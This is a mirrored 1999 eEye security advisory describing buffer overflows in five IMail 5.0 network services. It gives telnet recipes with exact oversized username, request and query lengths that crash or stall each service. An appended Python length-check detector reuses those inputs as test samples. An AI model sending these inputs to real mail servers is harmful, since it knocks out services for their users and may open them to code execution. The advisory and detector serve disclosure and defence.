
eeye.99-03-01.imail
Posted Sep 23, 1999

SHA-256 | 61b70b7edc28bf04b4e52aac409a46fa8c868c6ebbfadb429f5955bf82afa9be


From marc@EEYE.COM Wed Mar 3 03:00:41 1999
From: Marc <marc@EEYE.COM>
To: BUGTRAQ@netspace.org
Date: Mon, 1 Mar 1999 23:30:21 -0800
Subject: Multiple IMail Vulnerabilities


________________________________________________________________________

eEye Digital Security Team <e>
www.eEye.com
info@eEye.com
March 1, 1999
________________________________________________________________________

Multiple IMail Vulnerabilities

Systems Affected
IMail 5.0

Release Date
March 1, 1999

Advisory Code
AD03011999

________________________________________________________________________

Description:
________________________________________________________________________

The following holes can be used as a Denial of Service against the
various services mentioned and in some cases used to remotely execute
code.

---> Imapd (143)

The imapd login process does not do proper bounds checking on usernames
and passwords.

* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2

Where glob1 is 1200 characters and glob2 is 1300 characters. The imapd
service will crash with the usual overflow error.

---> LDAP (389)

Telnet to server.com 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter

Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service
goes to 90 percent or so and idles there, therefore using up most
system resources.

---> IMonitor (8181)

Telnet to server.com 8181
Send: glob1
hit enter twice

Where glob1 is 2045 characters. The IMonitor service crashes with the
normal overflow message.

---> IMail Web Service (8383)

Telnet to server.com 8383
Send: GET /glob1/

Where glob1 is 3000 characters. The usual overflow message will be
displayed. This one looks to be easily exploitable. >:-]

---> Whois32 Daemon (43)

Telnet to server.com 43
Send glob1

Where glob1 is 1000 characters. The usual overflow message will be
displayed. Ya... starting to sound old.

________________________________________________________________________

Vendor Status
________________________________________________________________________

Vendor has been notified. Waiting for response...

________________________________________________________________________

Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________

Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

________________________________________________________________________

Disclaimer:
________________________________________________________________________

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
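
Added example, not part of the eEye advisory: an IDS-style check that flags the oversized first-line fields the advisory describes for imapd, IMonitor, the web service and whois. The length limits are assumed policy values, not IMail's real buffer sizes, and LDAP is left out because real LDAP traffic is BER-encoded rather than line-based.

```python
# Added example: IDS-style length check for the first line a client sends.
# LIMITS are assumed policy values, not IMail's real buffer sizes.

def imap_login_args(line):
    # "X LOGIN user pass" -> [user, pass]; other commands are not inspected
    parts = line.split(b" ")
    if len(parts) >= 4 and parts[1].upper() == b"LOGIN":
        return parts[2:4]
    return []

def http_target(line):
    # "GET /path/ HTTP/1.0" -> [request target]
    return line.split(b" ")[1:2]

def whole_line(line):
    return [line]

# port -> (service name, field extractor, assumed maximum field length)
RULES = {
    143: ("imapd", imap_login_args, 256),
    8181: ("imonitor", whole_line, 1024),
    8383: ("web", http_target, 1024),
    43: ("whois", whole_line, 256),
}

def check(port, payload):
    """Return an alert string for an oversized field, or None."""
    rule = RULES.get(port)
    if rule is None:
        return None
    name, extract, limit = rule
    first_line = payload.split(b"\n", 1)[0].rstrip(b"\r")
    longest = max((len(f) for f in extract(first_line)), default=0)
    if longest > limit:
        return f"{name}/{port}: {longest}-byte field exceeds limit {limit}"
    return None

# Constructed samples: the lengths the advisory reports, plus benign lines.
SAMPLES = [
    (143, b"X LOGIN " + b"A" * 1200 + b" " + b"B" * 1300 + b"\r\n"),
    (143, b"X LOGIN alice secret\r\n"),
    (8383, b"GET /" + b"A" * 3000 + b"/\r\n"),
    (8383, b"GET /index.html HTTP/1.0\r\n"),
    (43, b"A" * 1000 + b"\r\n"),
    (43, b"example.com\r\n"),
]

if __name__ == "__main__":
    for port, data in SAMPLES:
        print(port, check(port, data) or "ok")
```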